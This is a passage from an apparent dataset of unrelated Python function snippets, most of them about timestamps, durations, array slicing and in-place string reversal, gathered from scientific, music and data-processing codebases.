{}\\n\".format(exit_on_error)\n ]\n\n try:\n n_times_chop = int(chop_len / dt)\n except:\n if exit_on_error:\n msg = [\"EXIT on ERROR\"]\n msg.extend(msg1)\n logger.exception(\"\\n\".join(msg))\n assert (chop_len > 0), \"Exit => chop_len: {}\\n\".format(chop_len)\n else: # data size < chop_length\n msg = [\"setting <chop_len> to number of time points!!!\"]\n msg.extend(msg1)\n logger.error(\"\\n\".join(msg))\n\n n_times_chop = n_times\n n_chops = 1\n msg = [\"data length smaller then chop length !!!\",\n \" --> Adjusting:\",\n \" -> number of chops: {}\".format(n_chops),\n \" -> chop time : {}\".format(n_times_chop)\n ]\n logger.warning(\"\\n\".join(msg))\n\n # check if chop length is larger than max time (e.g. if strict=True)\n if n_times_chop > n_times:\n n_times_chop = n_times\n\n # compute indices for each chop\n ix_start = np.arange(n_chops) * n_times_chop # first indices of each chop\n ix_end = np.append((ix_start - 1)[1:], n_times - 1) # add last entry with last index\n\n # chop indices\n chop_indices = np.zeros([n_chops, 2], dtype=np.int)\n chop_indices[:, 0] = ix_start\n chop_indices[:, 1] = ix_end\n\n # times in s\n chop_times = np.zeros([n_chops, 2], dtype=data_type)\n chop_times[:, 0] = times[ix_start]\n chop_times[:, 1] = times[ix_end]\n\n return chop_times, chop_indices", "def calc(s,tnx,i0s,ies):\n\n # round down\n tile0 = s.start // tnx\n # round up\n tilee = -(-s.stop // tnx)\n\n tiles = []\n srcslices = []\n tgtslices = []\n for tile in range(tile0,tilee):\n ii0 = max(0, -((s.start - i0s[tile]) // s.step))\n iie = -((s.start - min(s.stop,ies[tile])) // s.step)\n if iie > ii0:\n tiles.append(tile)\n myi0 = s.start + ii0*s.step - i0s[tile]\n myie = s.start + iie*s.step - i0s[tile]\n srcslices.append(slice(myi0,myie,s.step))\n tgtslices.append(slice(ii0,iie))\n\n return tiles, srcslices, tgtslices", "def de_flip2(n = 3,start = None):\n if start == None:\n start = '0'*(n//2) + '1' + '0'*(n//2)\n else:\n n = len(start)\n L = [[start]]\n L_tmp = []\n collect = []\n\n \n print(L)\n\n length = 1\n \n while(True):\n flag_cycle = -1\n count = 0\n for next_list in L:\n next_0 = next_list[-1][1:] + '0'\n next_1 = next_list[-1][1:] + '1'\n # 마지막 문자에서 0과 1을 추가한다.\n\n # 사이클완성!\n if next_0 == start:\n collect.append(next_list)\n flag_cycle = len(next_list)\n count += 1\n continue\n\n # 리스트에서 플립핑 검사\n if next_0 not in next_list and next_0[::-1] not in next_list:\n copy = next_list.copy()\n copy.append(next_0)\n L_tmp.append(copy)\n \n if next_1 not in next_list and next_1[::-1] not in next_list:\n copy = next_list.copy()\n copy.append(next_1)\n L_tmp.append(copy)\n \n if len(L_tmp) == 0:\n break\n L = L_tmp.copy()\n L_tmp = []\n\n print(\"length : {0}, flag_cycle : {1}, count : {2}\".format(length,flag_cycle,count))\n length += 1\n \n return collect", "def discrete_trajectory_to_wait_times(data, t_col='t', state_col='state'):\n\n states = data[state_col].values\n times = data[t_col].values\n num_measurements = len(data)\n\n # now iterate through valid part of trajectory to establish wait times\n start_times = []\n end_times = []\n earliest_st = [] # bounds on start time\n latest_st = []\n earliest_et = [] # bounds on end time\n latest_et = []\n wait_state = []\n wait_type = []\n k0 = 0 # index at which current state began\n state = states[k0]\n state_has_changed = False\n for k in range(num_measurements):\n # if no state change, continue\n if states[k] == state:\n continue\n # otherwise, store change\n start_times.append(times[k0])\n end_times.append(times[k])\n wait_state.append(state)\n # bounds on true wait time value\n if k0 == 0: # left exterior times have exactly determined \"start\"\n earliest_st.append(times[k0])\n else:\n earliest_st.append(times[k0-1])\n latest_st.append(times[k0])\n earliest_et.append(times[k-1])\n latest_et.append(times[k])\n # if this is the first state change, we store it separately\n if not state_has_changed:\n wait_type.append('left exterior')\n state_has_changed = True\n # otherwise, a normal state change\n else:\n wait_type.append('interior')\n # either way, state has changed\n state = states[k]\n k0 = k\n # also store the time spent in final state\n start_times.append(times[k0])\n end_times.append(times[k])\n if k0 == 0: # full exterior times also have exactly determined \"start\"\n earliest_st.append(times[k0])\n else:\n earliest_st.append(times[k0-1])\n latest_st.append(times[k0])\n # right/full exterior times have exactly determined \"end\"\n earliest_et.append(times[k])\n latest_et.append(times[k])\n # state type stored specially for final state\n wait_state.append(state)\n if not state_has_changed:\n wait_type.append('full exterior')\n else:\n wait_type.append('right exterior')\n start_times = np.array(start_times)\n end_times = np.array(end_times)\n wait_times = end_times - start_times\n min_waits = np.array(earliest_et) - np.array(latest_st)\n max_waits = np.array(latest_et) - np.array(earliest_st)\n df = pd.DataFrame({'start_time': start_times, 'end_time': end_times,\n 'wait_time': wait_times, 'state': wait_state,\n 'min_waits': min_waits, 'max_waits': max_waits,\n 'wait_type': wait_type})\n df.index.name = 'rank_order'\n df['window_size'] = times[-1] - times[0]\n return df", "def normalize_timestamp(timestamp_series):\n # convert datetime strings into milliseconds from epoch\n times = pd.to_datetime(timestamp_series, format='%Y-%m-%d %H:%M:%S').astype(np.int64) // int(1e6)\n return times", "def transform_timestamps(time_tracker):\n def calculate_timediff(t1, t2):\n return (t2 - t1).seconds + (t2 - t1).microseconds/1000000\n\n durations = dict()\n\n durations[\"Initialization\"] \\\n = round(calculate_timediff(time_tracker[\"time_start\"],\n time_tracker[\"after_init\"]), 3)\n\n durations[\"Configuration\"] \\\n = round(calculate_timediff(time_tracker[\"after_init\"],\n time_tracker[\"after_config\"]), 3)\n\n iter_list = []\n for i, iteration in enumerate(time_tracker[\"iterations\"]):\n if i == 0:\n iter_list\\\n .append(round(calculate_timediff(time_tracker[\"after_config\"],\n iteration), 3))\n else:\n iter_list\\\n .append(round(calculate_timediff(\n time_tracker[\"iterations\"][i-1], iteration), 3))\n durations[\"Iterations\"] = iter_list\n\n durations[\"Finalization\"] \\\n = round(calculate_timediff(time_tracker[\"iterations\"][-1],\n time_tracker[\"finish\"]), 3)\n durations[\"Total\"] \\\n = round(durations[\"Initialization\"] + durations[\"Configuration\"]\n + sum(durations[\"Iterations\"]) + durations[\"Finalization\"], 3)\n\n return durations", "def reverse_list(s):\r\n for i in range(len(s) // 2):\r\n s[i], s[-1-i] = s[-1-i], s[i]", "def create_timestructured(self, good, quantity):\n length = len(self._haves[good].time_structure)\n for i in range(length):\n qty = quantity[i] if type(quantity) == list else quantity / length\n self._haves[good].time_structure[i] += qty", "def timeave_old( mv ):\n # I haven't thought yet about how missing values would work with this...\n # If time intervals be unequal, this will have to be changed...\n sh = mv.shape # e.g. [312,90,144] for t,lat,lon\n n = sh[0]\n # BTW, this is the size of everything else:\n # n2 = reduce( operator.mul, sh[1:] ) # e.g. 90*144=12960\n mvta = numpy.sum( mv.__array__(), axis=0 )\n mvta /= n\n return mvta", "def reverseString(self, s):\n for i in range(len(s)//2):\n s[i], s[-(i+1)] = s[-(i+1)], s[i]", "def reverseString1(self, s):\n for i in range(len(s)//2):\n s[i], s[~i] = s[~i], s[i]", "def decodeSpaceTime(self, result):\r\n if self.case == 1:\r\n if self.granularity == 'day':\r\n return map(lambda x: [reader.formatTime(reader.inverseDaySinceEpoch(int(x[0]/self.scale))),\r\n reader.morton2coordsX2D(x[1], self.offx, self.scalex, self.roundNum), \r\n reader.morton2coordsY2D(x[1], self.offy, self.scaley, self.roundNum), x[2]], result)\r\n else:\r\n return map(lambda x: [int(x[0]/self.scale), reader.morton2coordsX2D(x[1], self.offx, self.scalex, self.roundNum), \r\n reader.morton2coordsY2D(x[1], self.offy, self.scaley, self.roundNum), x[2]], result)\r\n elif self.case == 2:\r\n if self.granularity == 'day':\r\n return map(lambda x: [reader.formatTime(reader.inverseDaySinceEpoch(int(x[0]/self.scale))), \r\n reader.morton2coordsX3D(x[1], self.offx, self.scalex, self.roundNum), \r\n reader.morton2coordsY3D(x[1], self.offy, self.scaley, self.roundNum), \r\n reader.morton2coordsZ3D(x[1], self.offz, self.scalez, self.roundNum)], result)\r\n else:\r\n return map(lambda x: [int(x[0]/self.scale), reader.morton2coordsX3D(x[1], self.offx, self.scalex, self.roundNum), \r\n reader.morton2coordsY3D(x[1], self.offy, self.scaley, self.roundNum), \r\n reader.morton2coordsZ3D(x[1], self.offz, self.scalez, self.roundNum)], result)\r\n elif self.case == 3:\r\n if self.granularity == 'day':\r\n return map(lambda x: [reader.formatTime(reader.inverseDaySinceEpoch(int(reader.morton2coordst3D(x[0])/self.scale))), \r\n reader.morton2coordsY3D(x[0], self.offx, self.scalex, self.roundNum),\r\n reader.morton2coordsZ3D(x[0], self.offy, self.scaley, self.roundNum), x[1]], result)\r\n else:\r\n return map(lambda x: [int(reader.morton2coordst3D(x[0])/self.scale), \r\n reader.morton2coordsY3D(x[0], self.offx, self.scalex, self.roundNum), \r\n reader.morton2coordsZ3D(x[0], self.offy, self.scaley, self.roundNum), x[1]], result)\r\n elif self.case == 4:\r\n if self.granularity == 'day':\r\n return map(lambda x: [reader.formatTime(reader.inverseDaySinceEpoch(int(reader.morton2coordst4D(x[0])/self.scale))), \r\n reader.morton2coordsX4D(x[0], self.offx, self.scalex, self.roundNum), \r\n reader.morton2coordsY4D(x[0], self.offy, self.scaley, self.roundNum), \r\n reader.morton2coordsZ4D(x[0], self.offz, self.scalez, self.roundNum)], result)\r\n else:\r\n return map(lambda x: [int(reader.morton2coordst4D(x[0])/self.scale), \r\n reader.morton2coordsX4D(x[0], self.offx, self.scalex, self.roundNum), \r\n reader.morton2coordsY4D(x[0], self.offy, self.scaley, self.roundNum), \r\n reader.morton2coordsZ4D(x[0], self.offz, self.scalez, self.roundNum)], result)", "def _getLilyDuration(self, alignBeat = None):\n # To tie notes, we can simply replace the duration with power-of-two\n # durations (or dotted durations) with tildes (~) between them.\n if self.duration == None:\n return \"\"\n if self._isBasisDuration():\n return int(1/self.getDurationNoDot())\n length = self.duration # non-reciprocal units\n nNotes = self.parseBeatLength(length)\n nNotes = [x for x in nNotes] # Need to convert tuple to a list to modify contents\n #print(\"1: {}\\n1/2: {}\\n1/4: {}\\n1/8: {}\\n1/16: {}\\n1/32: {}\\n1/64: {}\".format(\n # nNotes[0], nNotes[1], nNotes[2], nNotes[3], nNotes[4], nNotes[5], nNotes[6]))\n ll = []\n candot = False\n tieSymbol = \"\" # This will be populated later (this hack is to work around the dotted note)\n if alignBeat != None: # If we're considering the alignment beat,\n nBeats = self.parseBeatLength(alignBeat) # Parse the alignment beat count\n shortestBeat = 0\n for n in range(len(nBeats)): # Find the shortest non-zero beat duration\n if nBeats[-(n+1)] > 0: # i.e. if we're on beat 2.5 of 4/4 (alignBeat = 1/4 + 1/4 + 1/8 = 1/2 + 1/8,\n shortestBeat = len(nBeats) - (n + 1) # the shortest beat is 1/8\n if nNotes[shortestBeat] > 0: # If the note duration includes this shortest beat, let's start with that one\n ll.append(str(2**shortestBeat)) # Append it to the lily list\n nNotes[shortestBeat] = 0 # Then blank it out of the loop\n tieSymbol = self._lilyTie # Set the tie symbol for subsequent items in the list\n \n for n in range(len(nNotes)): # Walk through the breakdown of the note duration, starting from whole notes\n if nNotes[n] > 0: # If a duration exists,\n if candot: # If the last duration exists, we can dot it!\n candot = False # Then we turn off dotting so we don't end up with double-dots\n ll.append('.') # (those are silly)\n else:\n candot = True # The next note can be a dot if present\n durationInt = 2**n # 4 for quarter note, 8 for eighth note, etc...\n ll.append(\"{}{}\".format(tieSymbol, str(durationInt)))\n tieSymbol = self._lilyTie # Once the first symbol has been added to lily list, set the tie symbol\n else:\n candot = False # The next note cannot be a dot\n return \"\".join(ll)", "def trackBunchTurns(self, bunch):\n\t\tturns = self.__turns\n\t\t#start\n\t\tfor i in range(turns-1):\t\t\t\n\t\t\tself.trackBunch(bunch)\t\n\t\t\tsyncPart = bunch.getSyncParticle()\n\t\t\ttime = syncPart.time()\n\t\t\tself.setTimeDepStrength(time)\n\t\t\tprint \"debug trackBunchTurns time\",time,\"in\",i,\"turn\"\n\t\t#getsublattice\n\t\t#sublattice.trackBunch(bunch)", "def lrs(st):\n\n length, shifts = __lrs(st.root, 0)\n result = [length, []]\n for shift in shifts:\n lrs_string = st.text[shift[0]-length:shift[0]]\n result[1].append((lrs_string, [x-length for x in shift]))\n return result", "def stepify(times, values):\n new_times = np.empty((2*times.size - 1,))\n new_values = np.empty_like(new_times)\n new_times[::2] = times\n new_times[1::2] = times[1:]\n new_values[::2] = values\n new_values[1::2] = values[:-1]\n return new_times, new_values", "def detransform_from_seconds_without_intraday_gaps(transformed_seconds, market_hours: ul.MarketHours, fake_daily_minutes_gap = 60):\n timestamps = []\n \n for i in range(transformed_seconds.size):\n timestamps.append(transformed_seconds[i,0])\n return timestamps", "def id2segtimes(sid, ann_type=\"uppercase\", salamipath=dpath.SALAMI):\n files = id2filenames(sid, ann_type=ann_type, salamipath=salamipath)\n times = []\n for i in range(len(files)):\n events, _ = mir_eval.io.load_labeled_events(files[i])\n times = times + events[1:-1].tolist()\n return times", "def time_to_frames(times, sr=22050, hop_length=512, n_fft=None):\n\n samples = time_to_samples(times, sr=sr)\n\n return samples_to_frames(samples, hop_length=hop_length, n_fft=n_fft)", "def conv_time(l, h):\n\t# Function modified from post on ActiveState by John Nielsen\n\n\t#converts 64-bit integer specifying the number of 100-nanosecond\n\t#intervals which have passed since January 1, 1601.\n\t#This 64-bit value is split into the\n\t#two 32 bits stored in the structure.\n\td = 116444736000000000L \n\n\t# Some LNK files do not have time field populated \n\tif l + h != 0:\n\t\tnewTime = (((long(h) << 32) + long(l)) - d)/10000000 \n\telse:\n\t\tnewTime = 0\n\n\treturn time.strftime(\"%Y/%m/%d %H:%M:%S %a\", time.localtime(newTime))", "def convert_from_seconds(s):\n days = s // (24 * 3600) #Het aantal dagen\n time = s % (24 * 3600)\n hours = time // 3600\n time %= 3600\n minutes = time // 60\n time %= 60\n seconds = time\n return [days, hours, minutes, seconds]", "def shift_list(array, s):\n # Calculate acutal shift amount (e.g. 11 --> 1 if lenght of the array is 5)\n s %= len(array)\n\n # reverse the shift direction to be more intuitive\n s *= -1\n\n #shift arry with slicing\n shifted_array = array[s:] + array[:s]\n\n return shifted_array", "def trans_times_to_seg_times(trans_times):\n seg_times = np.diff(trans_times)\n return seg_times", "def _fancy_to_raw(sheng):\n raw_sheng = []\n for entry in sheng:\n raw_entry = list(entry[:6])\n raw_entry[0] += 1\n raw_entry[1] += 1\n raw_entry[2] += 1\n raw_sheng.append(raw_entry)\n\n return raw_sheng", "def _s2bl(size):\n return size**2 // 8 + 1", "def stump(t, n, angle=90):\n lt(t)\n fd(t, n)\n rt(t, angle)", "def ns_tarray_to_sFlat2(t_arr, DEPTH = 2):\n sflat = []\n tm, tm_max, dep = 0, 0, 0\n lis = t_arr.tolist()\n for i in range(t_arr.shape[0]):\n ctime, aflag = -1, False\n sflat.append([])\n sflat[i].append([0 for _ in range(DEPTH)])\n \n tm, dep = -1, 0 # tm -1 initiator\n \n st_arr = sorted(lis[i], key=lambda x: x[0] if x[0] != 0 else sys.maxsize)\n\n t_arr = numpy.array([st_arr])\n\n for j in range(t_arr.shape[1]):\n if dep == DEPTH: \n dep = 0\n # tm += 1\n # sflat[i].append([0 for _ in range(SPREAD)])\n if ctime == t_arr[i, j, 0] and dep == 0: \n continue\n elif ctime != t_arr[i, j, 0]:\n sflat[i].append([0 for _ in range(DEPTH)])\n tm += 1\n dep = 0\n\n sflat[i][tm][dep] = int(t_arr[i, j, 1])\n ctime = t_arr[i, j, 0]\n dep += 1\n \n tm_max = max([len(v) for v in sflat])\n \n #triming the array\n sflat_arr = numpy.zeros((t_arr.shape[0], tm_max + 1, DEPTH), dtype = 'int32') #because tm_max is zeo based indexing\n for i in range(sflat_arr.shape[0]):\n for j in range(len(sflat[i])):\n for k in range(sflat_arr.shape[2]):\n sflat_arr[i, j, k] = sflat[i][j][k]\n return sflat_arr", "def square(t, length):\n for i in range(4):\n t.fd(length)\n t.lt(90)", "def utlibr(time):\n\n if time.size == 1:\n return iers.utlibr(time.tt.mjd)\n else:\n # Only loop over unique epochs\n _, idx, r_idx = np.unique(np.asarray(time), return_index=True, return_inverse=True)\n return np.array([iers.utlibr(t.tt.mjd) for t in time[idx]])[r_idx]", "def time_period(s,h=30):\n\n t = 0\n\n old_z, pass_1 = 0, None\n\n while(True):\n k1 = h*sdot(s)\n k2 = h*sdot(s+k1/2)\n k3 = h*sdot(s+k2/2)\n k4 = h*sdot(s+k3)\n\n s = s+(k1+2*k2+2*k3+k4)/6\n t = t+h\n\n if (s[2]>=0 and old_z<0):\n dt = -s[2]/s[5]\n t2 = t+dt\n\n if pass_1 is None:\n pass_1 = t2\n else:\n return t2-pass_1\n\n old_z = s[2]", "def adjust_layer_temps(self):\n\n if self.layer_count == 1:\n self.t_s_0 = self.new_tsno(\n self.m_s_0,\n self.t_s_0,\n self.cc_s_0)\n self.t_s = self.t_s_0\n\n elif self.layer_count == 2:\n if self.isothermal:\n self.t_s = FREEZE\n self.t_s_l = FREEZE\n self.t_s_0 = FREEZE\n else:\n self.t_s_0 = self.new_tsno(\n self.m_s_0,\n self.t_s_0,\n self.cc_s_0)\n self.t_s_l = self.new_tsno(\n self.m_s_l,\n self.t_s_l,\n self.cc_s_l)\n self.t_s = self.new_tsno(\n self.m_s,\n self.t_s,\n self.cc_s)", "def ltos(n):\r\n s = ''\r\n for x in (2**24, 2**16, 2**8):\r\n quot, rem = (n/x, n%x)\r\n s += chr(quot)\r\n n = rem\r\n s += chr(n % 256)\r\n return s", "def OPCtimetransformOld(data, to):\n outtimes = []\n \n times = {\n 'ms':[],\n 'SS':[],\n 'MM':[],\n 'HH':[]\n }\n for i in range(0, len(data)):\n item = data[i]\n try: \n times['HH'].append(int(item[0:2]))\n times['MM'].append(int(item[2:4]))\n times['SS'].append(int(item[4:6]))\n times['ms'].append(int(item[7:9]))\n except ValueError:\n # strange value 2319010.00 in 201129 file...\n olditem = item\n newitem = item[:4] + item[4+1:]\n print( ('Repairing strange value %s into %s')%(olditem, newitem) )\n try:\n times['HH'].append(int(newitem[0:2]))\n times['MM'].append(int(newitem[2:4]))\n times['SS'].append(int(newitem[4:6]))\n times['ms'].append(int(newitem[7:9]))\n except ValueError:\n print(newitem)\n\n # OPC times go up to 60 minutes. This is corrected by moving one minute\n times['MM'] = [max(0,x-1) for x in times['MM']]\n times['SS'] = [max(0,x-1) for x in times['SS']]\n\n for i in range(0, len(data)):\n md = dt.datetime(1900,1,1,times['HH'][i], times['MM'][i], times['SS'][i]) \n outtimes.append( dt.datetime.strftime(md, to))\n\n return outtimes", "def time_convert(intime):\n Nt = intime.shape[0]\n outtime = []\n for t in range(Nt):\n timestr = ''.join([intime[t,:][~intime[t,:].mask].data[i].decode('utf-8') for i in range(len(intime[t,:][~intime[t,:].mask].data))])\n outtime.append(datetime.strptime(timestr, '%Y-%m-%d_%H:%M:%S'))\n return outtime", "def sfreq_to_times(gaze_array, sfreq, start_time=0):\n return np.arange(0, len(gaze_array) / sfreq, 1. / sfreq) + start_time", "def boxcox_reverse(x_t, lam):\n\n orig_scale = (lam*x_t + 1)**(1/lam)\n orig_scale = (orig_scale.fillna(0)).transpose('time', 'lat', 'lon')\n\n return orig_scale", "def twiddle_normal_to_fast_format(twiddle):\n twiddle = twiddle.clone()\n nstack = twiddle.shape[0]\n n = twiddle.shape[2] * 2\n m = int(math.log2(n))\n twiddle[:, :, :, 1] = twiddle[:, :, :, 1, [1, 0]]\n twiddle_list = []\n for i in range(m):\n stride = 1 << i\n new_twiddle = twiddle[:, i]\n new_twiddle = new_twiddle.reshape(nstack, n // 2 // stride, stride, 2, 2)\n new_twiddle = new_twiddle.permute(0, 1, 3, 2, 4)\n new_twiddle = new_twiddle.reshape(nstack, n, 2).transpose(1, 2)\n twiddle_list.append(new_twiddle)\n result = torch.stack(twiddle_list, dim=1)\n return result", "def trc_prep(self,m,ds,s,mode=2):\n m_out=np.zeros((m.shape[0],11*ds+1))\n if mode==1:\n for i,j in enumerate(m):\n m_out[i,:]=np.hstack((m[i,1*s-ds:1*s],m[i,2*s-ds:2*s],m[i,3*s-ds:3*s],m[i,4*s-ds:4*s],m[i,5*s-ds:5*s],m[i,6*s-ds:6*s],m[i,7*s-ds:7*s],m[i,8*s-ds:8*s],m[i,9*s-ds:9*s],m[i,10*s-ds:10*s],m[i,11*s-ds:11*s],m[i,11*s]))\n elif mode==2:\n for i,j in enumerate(m):\n m_out[i,:]=np.hstack((m[i,0*s:0*s+ds],m[i,1*s:1*s+ds],m[i,2*s:2*s+ds],m[i,3*s:3*s+ds],m[i,4*s:4*s+ds],m[i,5*s:5*s+ds],m[i,6*s:6*s+ds],m[i,7*s:7*s+ds],m[i,8*s:8*s+ds],m[i,9*s:9*s+ds],m[i,10*s:10*s+ds],m[i,11*s]))\n return m_out", "def long_training_sequence():\n\n symbol = np.fft.ifft(long_training_symbol())\n full_long_time = np.concatenate([symbol[32:], symbol, symbol]) # two symbols plus 32 samples of GI\n return full_long_time.tolist()", "def reverseString1(s: List[str]) -> None:\n len_of_s = len(s)\n for i in range(len_of_s // 2):\n start = i\n end = len_of_s - start - 1\n if start >= end:\n return\n s[start], s[end] = s[end], s[start]\n\n # 시간복잡도 = O(n)", "def _ls2nms(self, ls):\n nms = []\n for l in ls:\n if l % 2 == 1:\n # max(m) < l\n nms += [(l, m) for m in range(0, l, 2)]\n else:\n # max(m) == l\n nms += [(l, m) for m in range(0, l+1, 2)]\n return nms", "def make_lattice(s):\n n = s*s\n g = Graph(n)\n\n for v in range(n):\n if v % s == 0:\n continue\n g.add_edge(v, v+1)\n if v > s*s-s:\n continue\n g.add_edge(v, v+s)\n g.add_edge(v+1, v+s+1)\n return 1, g, n", "def calc_time(directions_result):\n\n # there is only one leg\n legs = directions_result[\"legs\"][0][\"steps\"]\n\n steps = map(lambda x: (x[\"travel_mode\"], x[\"start_location\"], x[\"end_location\"]), legs)\n\n walking = filter(lambda x: x[0] == \"WALKING\", steps)\n transit = filter(lambda x: x[0] == \"TRANSIT\", steps)\n\n\n walking_to_biking = map(lambda x: gmaps.directions(\n x[1], x[2],\n mode=\"bicycling\"), walking)\n\n transit_final = map(lambda x: gmaps.directions(\n x[1], x[2], mode=\"transit\"), transit)\n\n\n walking_addrs = map(lambda x : (x[0][\"legs\"][0][\"start_address\"], x[0][\"legs\"][0][\"end_address\"]), walking_to_biking)\n transit_addrs = map(lambda x : (x[0][\"legs\"][0][\"start_address\"], x[0][\"legs\"][0][\"end_address\"]), transit_final)\n\n all_legs = map(lambda x:\n sum(map(lambda y: y[\"duration\"][\"value\"], x[0][\"legs\"]))\n ,walking_to_biking+transit_final)\n\n final = zip(all_legs, walking+transit, walking_addrs+transit_addrs)\n\n\n def reconstruct():\n w,t = 0,len(walking)\n arr = []\n for i in xrange(len(all_legs)):\n if steps[i][0] == \"TRANSIT\":\n arr.append(final[t])\n t += 1\n else:\n arr.append(final[w])\n w += 1\n return arr\n\n\n total_time = sum(all_legs) \n\n return total_time, reconstruct()", "def reverseString(self, s: List[str]) -> None:\n size = len(s)\n for i in range(size//2):\n s[i], s[~i] = s[~i], s[i]\n # s[i], s[size-i-1] = s[size-i-1], s[i]\n\n # s[:] = s[::-1]", "def getTimes():", "def getTimes():", "def getTimes():", "def diffsents(sa, sb):\n m = len(sa)\n n = len(sb)\n la = lb = 0\n ra = m - 1\n rb = n - 1\n while la < m and lb < n:\n if sa[la] == sb[lb]:\n la += 1\n lb += 1\n else:\n break\n while ra >= 0 and rb >= 0:\n if sa[ra] == sb[rb]:\n ra -= 1\n rb -= 1\n else:\n break\n while la > ra or lb > rb:\n # la -= 1\n ra += 1\n # lb -= 1\n rb += 1\n if la == ra == m or lb == rb == n:\n la -= 1\n ra -= 1\n lb -= 1\n rb -= 1\n assert 0 <= la <= ra < m, \"{}\\t{}\\t{}\\t{}\\t{}\".format(m, la, ra, sa, sb)\n assert 0 <= lb <= rb < n, \"{}\\t{}\\t{}\\t{}\\t{}\".format(n, lb, rb, sb, sa)\n # sa[la, ra+1], sb[lb, rb+1]\n return la, ra, lb, rb", "def diffsents(sa, sb):\n m = len(sa)\n n = len(sb)\n la = lb = 0\n ra = m - 1\n rb = n - 1\n while la < m and lb < n:\n if sa[la] == sb[lb]:\n la += 1\n lb += 1\n else:\n break\n while ra >= 0 and rb >= 0:\n if sa[ra] == sb[rb]:\n ra -= 1\n rb -= 1\n else:\n break\n while la > ra or lb > rb:\n # la -= 1\n ra += 1\n # lb -= 1\n rb += 1\n if la == ra == m or lb == rb == n:\n la -= 1\n ra -= 1\n lb -= 1\n rb -= 1\n assert 0 <= la <= ra < m, \"{}\\t{}\\t{}\\t{}\\t{}\".format(m, la, ra, sa, sb)\n assert 0 <= lb <= rb < n, \"{}\\t{}\\t{}\\t{}\\t{}\".format(n, lb, rb, sb, sa)\n # sa[la, ra+1], sb[lb, rb+1]\n return la, ra, lb, rb", "def build_zigzag_times(rips,n,numbins):\n times = [[] for x in range(0,rips.__len__())]\n i=0\n for x in rips:\n dim = x.dimension()\n t = [];\n for k in range(0,dim+1):\n t.append(x[k])\n xmin = math.floor(min(t)/n)\n xmax = math.floor(max(t)/n)\n if xmax == 0:\n bd = [0,1]\n elif xmin == numbins-1:\n bd = [2*xmin-1,2*xmin]\n elif xmax == xmin:\n bd = [2*xmin-1,2*xmin+1]\n elif xmax > xmin:\n bd = [2*xmax-1,2*xmax-1]\n else:\n print(\"Something has gone horribly wrong!\")\n times[i] = bd\n i = i+1\n return times", "def extend(self, s):\n newTimeExtent = int(s + 1 - 1e-10)\n if newTimeExtent > self.timeExtent:\n for s in xrange(self.timeExtent , newTimeExtent):\n self.drawSecond(s)\n self.timeExtent = newTimeExtent\n self.resize(newTimeExtent * self.scale, self.height)\n for f in self.resizeCallbacks:\n f()", "def time_decode(self):\n for ii in range(100):\n msg = DIMSEMessage()\n for fragment in self.fragments:\n msg.decode_msg(fragment)", "def _to(\n self, state: List[np.ndarray], reset: bool\n ) -> Union[TimeStep, Tuple[Any, np.ndarray, np.ndarray, Any]]:", "def dnds_to_ngts(s_vector, dnds):\n delta_s = s_vector[1] - s_vector[0]\n revngts = np.cumsum(dnds[::-1]) * delta_s\n return revngts[::-1]", "def bson_ts_to_long(timestamp):\n converted_time = (timestamp.time << 32) + timestamp.inc\n return converted_time", "def sundial_time(cls, tee):\n date = Clock.fixed_from_moment(tee)\n time = mod(tee, 1)\n q = ifloor(4 * time)\n if q == 0:\n a = cls.sunset(date - 1)\n b = cls.sunrise(date)\n t = Clock.days_from_hours(-6)\n elif q == 3:\n a = cls.sunset(date)\n b = cls.sunrise(date + 1)\n t = Clock.days_from_hours(18)\n else:\n a = cls.sunrise(date)\n b = cls.sunset(date)\n t = Clock.days_from_hours(6)\n return a + (2 * (b - a) * (time - t))", "def shifter(self):\n #self.BA_shift = self.timeshift_latitude(self.latB, self.latA)\n #self.BC_shift = self.timeshift_latitude(self.latB, self.latC)\n\n\n self.shifted = True #changing boolean to True when function is called.\n\n secondsA = self.secondsA\n secondsB = self.secondsB\n secondsC = self.secondsC\n\n NeA = self.holefill(self.NeA, secondsA)\n NeB = self.holefill(self.NeB, secondsB)\n NeC = self.holefill(self.NeC, secondsC)\n\n start = 0\n stop = len(NeA) - np.max(np.array([self.BA_shift, self.BC_shift]))\n\n startA = start + self.BA_shift\n stopA = stop + self.BA_shift\n\n startC = start + self.BC_shift\n stopC = stop + self.BC_shift\n\n NeA = NeA[startA:stopA]\n NeB = NeB[start:stop]\n NeC = NeC[startC:stopC]\n\n longA = self.holefill(self.longA, secondsA)\n longB = self.holefill(self.longB, secondsB)\n longC = self.holefill(self.longC, secondsC)\n longA = longA[startA:stopA]\n longB = longB[start:stop]\n longC = longC[startC:stopC]\n\n latA = self.holefill(self.latA, secondsA)\n latB = self.holefill(self.latB, secondsB)\n latC = self.holefill(self.latC, secondsC)\n latA = latA[startA:stopA]\n latB = latB[start:stop]\n latC = latC[startC:stopC]\n\n radA = self.holefill(self.radA, secondsA)\n radB = self.holefill(self.radB, secondsB)\n radC = self.holefill(self.radC, secondsC)\n radA = radA[startA:stopA]\n radB = radB[start:stop]\n radC = radC[startC:stopC]\n\n velA = self.holefill(self.velA, secondsA)\n velB = self.holefill(self.velB, secondsB)\n velC = self.holefill(self.velC, secondsC)\n velA = velA[startA:stopA]\n velB = velB[start:stop]\n velC = velC[start:stop]\n\n altA = self.holefill(self.altA, secondsA)\n altB = self.holefill(self.altB, secondsB)\n altC = self.holefill(self.altC, secondsC)\n altA = altA[startA:stopA]\n altB = altB[start:stop]\n altC = altC[startC:stopC]\n\n\n mlatA = self.holefill(self.mlatA, secondsA)\n mlatB = self.holefill(self.mlatB, secondsB)\n mlatC = self.holefill(self.mlatC, secondsC)\n mlatA = mlatA[startA:stopA]\n mlatB = mlatB[start:stop]\n mlatC = mlatC[startC:stopC]\n\n mlongA = self.holefill(self.mlongA, secondsA)\n mlongB = self.holefill(self.mlongB, secondsB)\n mlongC = self.holefill(self.mlongC, secondsC)\n mlongA = mlongA[startA:stopA]\n mlongB = mlongB[start:stop]\n mlongC = mlongC[startC:stopC]\n\n mltA = self.holefill(self.mltA, secondsA)\n mltB = self.holefill(self.mltB, secondsB)\n mltC = self.holefill(self.mltC, secondsC)\n mltA = mltA[startA:stopA]\n mltB = mltB[start:stop]\n mltC = mltC[startC:stopC]\n\n secondsA = self.holefill(secondsA, secondsA)\n secondsB = self.holefill(secondsB, secondsB)\n secondsC = self.holefill(secondsC, secondsC)\n secondsA = secondsA[startA:stopA]\n secondsB = secondsB[start:stop]\n secondsC = secondsC[startC:stopC]\n\n indsA = np.nonzero(secondsA)[0]\n indsB = np.nonzero(secondsB)[0]\n indsC = np.nonzero(secondsC)[0]\n\n inds = np.intersect1d(indsA, indsB)\n inds = np.intersect1d(inds, indsC)\n\n 